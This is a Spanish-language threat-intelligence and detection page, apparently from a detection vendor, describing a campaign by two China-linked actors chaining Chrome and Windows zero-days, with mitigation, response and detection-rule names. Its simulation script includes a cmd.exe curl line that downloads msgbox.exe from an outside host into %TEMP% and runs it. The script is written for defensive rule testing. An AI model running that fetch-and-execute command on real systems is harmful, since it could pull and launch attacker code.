Actores de amenaza chinos encadenan vulnerabilidades de día cero en navegadores y Windows
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Dos actores de amenaza chinos, UTA0560 y JungleBamboo, están utilizando una cadena de explotación sofisticada de múltiples etapas que apunta a Google Chrome y al núcleo de Windows. Los ataques aprovechan un período de brecha de parches en el que las vulnerabilidades se corrigen en Chromium antes de que las actualizaciones correspondientes lleguen a las versiones de Google Chrome liberadas. Los señuelos de spear-phishing entregan diferentes cargas útiles, incluido el backdoor JScript GRIMWEDGE y la extensión de Chrome LONGTALE.
Investigación
El monitoreo de seguridad de red de Volexity identificó una campaña de spear-phishing dirigida a ONGs el 1 de septiembre de 2026. La investigación descubrió una cadena de explotación compartida que involucra CVE-2026-85046, CVE-2026-87491 y CVE-2026-85880. Los analistas separaron la actividad en dos grupos: UTA0560 implementando GRIMWEDGE y JungleBamboo utilizando SUPERSTOMP para instalar la extensión LONGTALE.
Mitigación
Las organizaciones deben mantener Google Chrome actualizado a la última versión disponible para reducir la exposición durante los períodos de brecha de parches. Los equipos de seguridad deben monitorear comportamientos inusuales en procesos hijos de Chrome e instalaciones no autorizadas de extensiones de Chrome. También se recomienda un filtrado de correo fuerte para señuelos de spear-phishing y monitoreo de la creación de tareas programadas sospechosas o no autorizadas.
Respuesta
Si se detecta explotación, los hosts afectados deben ser aislados inmediatamente para prevenir más comunicaciones de comando y control o movimiento lateral. Los respondedores deben realizar forense de memoria en los procesos de Chrome para identificar shellcode inyectado. También se deben auditar las extensiones instaladas de Chrome y revisar las tareas programadas en busca de entradas sospechosas como Sistema Programado de Windows.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Deteccciones
Uso sospechoso de CURL (mediante línea de comandos)
Comando y control sospechoso por solicitud DNS de un dominio de nivel superior (TLD) inusual (mediante dns)
Tarea programada sospechosa (mediante auditoría)
IOCs (HashSha256) para detectar: Cuida la brecha (Patch) Gap: Varios actores de amenaza chinos encadenan exploits 0-day en Chrome y Windows
IOCs (FuenteIP) para detectar: Cuida la brecha (Patch) Gap: Varios actores de amenaza chinos encadenan exploits 0-day en Chrome y Windows
IOCs (DestinoIP) para detectar: Cuida la brecha (Patch) Gap: Varios actores de amenaza chinos encadenan exploits 0-day en Chrome y Windows
Páginas de aterrizaje de la cadena de explotación Zero-Day de Chrome [Servidor web]
Detección de GRIMWEDGE JScript Backdoor y actividad de entrega de carga útil [Creación de proceso de Windows]
Ejecución de simulación
-
Narrativa de ataque y comandos: El adversario busca establecer una presencia en el sistema comprometido al desplegar el backdoor JScript GRIMWEDGE. Para evitar la detección por AV basado en firmas simples, el atacante utiliza
cmd.exey la utilidad nativacurlpara descargar un cargador de segundo nivel llamadomsgbox.exedesde una infraestructura remota de comando y control (C2). Una vez completada la descarga, el atacante ejecuta inmediatamente la carga útil desde el%TEMP%directorio para minimizar el tiempo que el archivo permanece en el disco y utilizar un directorio que a menudo es pasado por alto por la monitorización básica. Esta secuencia está diseñada para coincidir con el patrón específico de línea de comandos que la regla de detección busca. -
Script de prueba regresiva:
# Script de simulación para activar la regla de detección de GRIMWEDGE. # Este script crea un archivo ficticio para simular la carga útil descargada. $tempDir = $env:TEMP $payloadName = "msgbox.exe" $payloadPath = Join-Path $tempDir $payloadName # 1. Crear un 'msgbox.exe' ficticio para simular la carga útil descargada # En un ataque real, este sería el binario malicioso real. New-Item -Path $payloadPath -ItemType File -Force Set-Content -Path $payloadPath -Value "Contenido de carga útil ficticia" # 2. Ejecutar la cadena de comandos exacta identificada en la lógica de detección. # Nota: Usamos un enfoque de echo/mock local para la URL para asegurar que la cadena de comandos coincida exactamente. cmd.exe /c "curl -f -sS -o ""$tempDirmsgbox.exe"" ""https://cloud.shinewrist.net/test/msgbox.exe"" && ""$tempDirmsgbox.exe""" Write-Host "Simulación completada. Verifique SIEM para alertas que coincidan con el patrón GRIMWEDGE." -
Comandos de limpieza:
# Script de limpieza para eliminar la carga útil simulada y archivos. $tempDir = $env:TEMP $payloadPath = Join-Path $tempDir "msgbox.exe" if (Test-Path $payloadPath) { Remove-Item -Path $payloadPath -Force Write-Host "Limpieza exitosa: $payloadPath eliminado." } else { Write-Host "Carga útil no encontrada. Limpieza innecesaria." }